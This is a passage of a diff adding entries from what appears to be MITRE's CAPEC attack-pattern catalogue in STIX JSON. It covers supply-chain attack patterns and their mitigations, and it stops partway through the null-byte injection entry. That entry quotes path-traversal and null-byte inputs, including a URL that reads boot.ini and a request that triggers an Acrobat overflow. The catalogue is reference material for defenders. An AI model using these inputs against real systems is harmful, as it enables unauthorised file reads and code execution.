Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution During Baselining", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary supplies the product development facility of a network security device with a hardware component that is used to simulate large volumes of network traffic. The device claims in logs, stats, and via the display panel to be pumping out very large quantities of network traffic, when it is in fact putting out very low volumes. The developed product is adjusted and configured to handle what it believes to be a heavy network load, but when deployed at the victim site the large volumes of network traffic are dropped instead of being processed by the network security device. This allows the adversary an advantage when attacking the victim in that the adversary's presence may not be detected by the device.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary will need either physical access or be able to supply malicious hardware components to the product development facility." + ], + "x_capec_skills_required": { + "High": "Resources to physically infiltrate supplier.", + "Medium": "Intelligence data on victim's purchasing habits." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hardware attacks are often difficult to detect, as inserted components can be difficult to identify or remain dormant for an extended period of time.", + "id": "course-of-action--fb844bff-17ce-4a81-b7c9-d963af144f72", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66c31447-50cf-486f-9c66-c9a60af6772c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb844bff-17ce-4a81-b7c9-d963af144f72", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.", + "id": "course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dcf9dff1-8779-42aa-b16f-b9a8537f2e04", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation, which include descriptions of advanced technology and/or specific components' criticality, alters the documents to circumvent dial-down functionality requirements. This alteration would change the interpretation of implementation and manufacturing techniques, allowing for advanced technologies to remain in place even though these technologies might be restricted to certain customers, such as nations on the terrorist watch list, giving the attacker on the receiving end of a shipped product access to an advanced technology that might otherwise be restricted.", + "external_references": [ + { + "external_id": "CAPEC-517", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/517.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Circumvent Dial-down", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "A product for manufacture exists that contains advanced cryptographic capabilities, including algorithms that are restricted from being shipped to some nations. An attacker from one of the restricted nations alters the documentation to ensure that when the product is manufactured for shipment to a restricted nation, the software compilation steps that normally would prevent the advanced cryptographic capabilities from being included are actually included. When the product is shipped to the attacker's home country, the attacker is able to retrieve and/or use the advanced cryptographic capabilities." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of internal software and hardware components within manufacturer's development environment.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Digitize documents and cryptographically sign them to verify authenticity.", + "id": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6cdce0e6-c111-4a35-bd94-2fd9bc65869b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Password protect documents and make them read-only for unauthorized users.", + "id": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1a2f5635-3164-4960-8cc1-c813d8955f6c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid emailing important documents and configurations.", + "id": "course-of-action--846a9f00-d294-480b-b806-4b61a6dc9ebb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--de958332-453b-4c56-9e15-f562941f06cf", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--846a9f00-d294-480b-b806-4b61a6dc9ebb", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure deleted files are actually deleted.", + "id": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e4cacf14-7742-4ddf-95a4-24294756229f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain backups of the document for recovery and verification.", + "id": "course-of-action--b0455d25-551c-4791-a1fa-a71d534d7c5d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38d7d40a-e9d8-4f1e-802a-9fe83f5555c9", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b0455d25-551c-4791-a1fa-a71d534d7c5d", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation alters the descriptions of system capabilities with the intent of causing errors in derived system requirements, impacting the overall effectiveness and capability of the system, allowing an attacker to take advantage of the introduced system capability flaw once the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-518", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/518.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Produce Under-performing Systems", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "A security subsystem involving encryption is a part of a product, but due to the demands of this subsystem during operation, the subsystem only runs when a specific amount of memory and processing is available. An attacker alters the descriptions of the system capabilities so that when deployed with the minimal requirements at the victim location, the encryption subsystem is never operational, leaving the system in a weakened security state." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of software and hardware capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec5bea13-d325-4683-9122-b0c7ccec06d4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--281d70fc-8c58-4d68-b561-0575eb42bff4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4b968907-0019-4de5-a82c-c682cd39577d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--846a9f00-d294-480b-b806-4b61a6dc9ebb", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f11b49e7-b222-4698-9d7e-7b3098fd3c64", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed8d0d52-a412-470e-b2f6-7eaabadaa611", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b0455d25-551c-4791-a1fa-a71d534d7c5d", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate need-to-know information from system configuration information depending on the user.", + "id": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-518-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d472e01d-f213-4ced-9fb6-4461edf5f092", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation containing requirements allocation and software design processes maliciously alters the documentation in order to cause errors in system design. This allows the attacker to take advantage of a weakness in a deployed system of the manufacturer for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-519", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/519.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Cause Errors in System Design", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "During operation, a firewall will restart various subsystems to reload and implement new rules as added by the user. An attacker alters the software design dependencies in the manufacturer's documentation so that under certain predictable conditions the reload will fail to load in rules resulting in a \"fail open\" state. Once deployed at a victim site, this will allow the attacker to bypass the victim's firewall." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of software capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--692efabe-275a-4cc4-bce9-b954a6533546", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--133b4c1d-e9fa-451c-aa3f-f35f367c171d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d8f71d06-67ab-4df7-adc0-fc46f3ca18e4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--846a9f00-d294-480b-b806-4b61a6dc9ebb", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain multiple instances of the document across different privileged users for recovery and verification.", + "id": "course-of-action--909a3c5e-8513-4df9-9bd5-f26ba60c60d8", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-519-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbc5aeb2-78f0-4099-a03c-df1e088a6f51", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--909a3c5e-8513-4df9-9bd5-f26ba60c60d8", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary embeds one or more null bytes in input to the target software. This attack relies on the usage of a null-valued byte as a string terminator in many environments. The goal is for certain components of the target software to stop processing the input when it encounters the null byte(s).", + "external_references": [ + { + "external_id": "CAPEC-52", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/52.html" + }, + { + "external_id": "CWE-158", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "Null Byte Injection", + "external_id": "28", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Null-Byte-Injection" + }, + { + "description": "Embedding Null Code", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Embedding_Null_Code" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Adobe Acrobat/Acrobat Reader ActiveX Control Buffer Overflow Vulnerability, iDefense Labs Public Advisory, 2004--08---13, Verisign, Inc.", + "external_id": "REF-445", + "source_name": "reference_from_CAPEC", + "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=126" + }, + { + "description": "PHP Input Validation Vulnerabilities, Bugtraq mailing list archive", + "external_id": "REF-446", + "source_name": "reference_from_CAPEC", + "url": "http://msgs.securepoint.com/bugtraq/" + } + ], + "id": "attack-pattern--7e2a629f-eb4d-4cc9-b086-42c7395b2c3e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Embedding NULL Bytes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Directory Browsing\n Assume a Web application allows a user to access a set of reports. The path to the reports directory may be something like web/username/reports. If the username is supplied via a hidden field, an adversary could insert a bogus username such as ../../../../../WINDOWS. If the adversary needs to remove the trailing string /reports, then they can simply insert enough characters so the string is truncated. Alternatively the adversary might apply the postfix NULL character (%00) to determine whether this terminates the string.\n Different forms of NULL to think about include\n PATH%00PATH[0x00]PATH[alternate representation of NULL character]%00\n ", + "\n Exploitation of a buffer overflow vulnerability in the ActiveX component packaged with Adobe Systems Inc.'s Acrobat/Acrobat Reader allows remote adversaries to execute arbitrary code.\n The problem specifically exists upon retrieving a link of the following form:\n GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1\n Where [long string] is a malicious crafted long string containing acceptable URI characters. The request must be made to a web server that truncates the request at the null byte (%00), otherwise an invalid file name is specified and a \"file not found\" page will be returned. Example web servers that truncate the requested URI include Microsoft IIS and Netscape Enterprise. Though the requested URI is truncated for the purposes of locating the file the long string is still passed to the Adobe ActiveX component responsible for rendering the page. This in turn triggers a buffer overflow within RTLHeapFree() allowing for an adversary to overwrite an arbitrary word in memory. The responsible instructions from RTLHeapFree() are shown here:\n 0x77F83AE5 MOV EAX,[EDI+8]0x77F83AE8 MOV ECX,[EDI+C]...0x77F83AED MOV [ECX],EAX\n The register EDI contains a pointer to a user-supplied string. The adversary therefore has control over both the ECX and EAX registers used in the shown MOV instruction.\n Successful exploitation allows remote adversaries to utilize the arbitrary word overwrite to redirect the flow of control and eventually take control of the affected system. Code execution will occur under the context of the user that instantiated the vulnerable version of Adobe Acrobat.\n An adversary does not need to establish a malicious web site as exploitation can occur by adding malicious content to the end of any embedded link and referencing any Microsoft IIS or Netscape Enterprise web server. Clicking on a direct malicious link is also not required as it may be embedded within an IMAGE tag, an IFRAME or an auto-loading script.\n Successful exploitation requires that a payload be written such that certain areas of the input are URI acceptable. This includes initial injected instructions as well as certain overwritten addresses. This increases the complexity of successful exploitation. While not trivial, exploitation is definitely plausible [REF-445].See also: CVE-2004-0629", + "\n Consider the following PHP script:\n $whatever = addslashes($_REQUEST['whatever']);include(\"/path/to/program/\" . $whatever . \"/header.htm\");\n A malicious adversary might open the following URL, disclosing the boot.ini file:\n http://localhost/phpscript.php?whatever=../../../../boot.ini%00\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects postfix null byte(s) to observe how the application handles them as input. The adversary is looking for areas where user input is placed in the middle of a string, and the null byte causes the application to stop processing the string at the end of the user input.

    2. Techniques
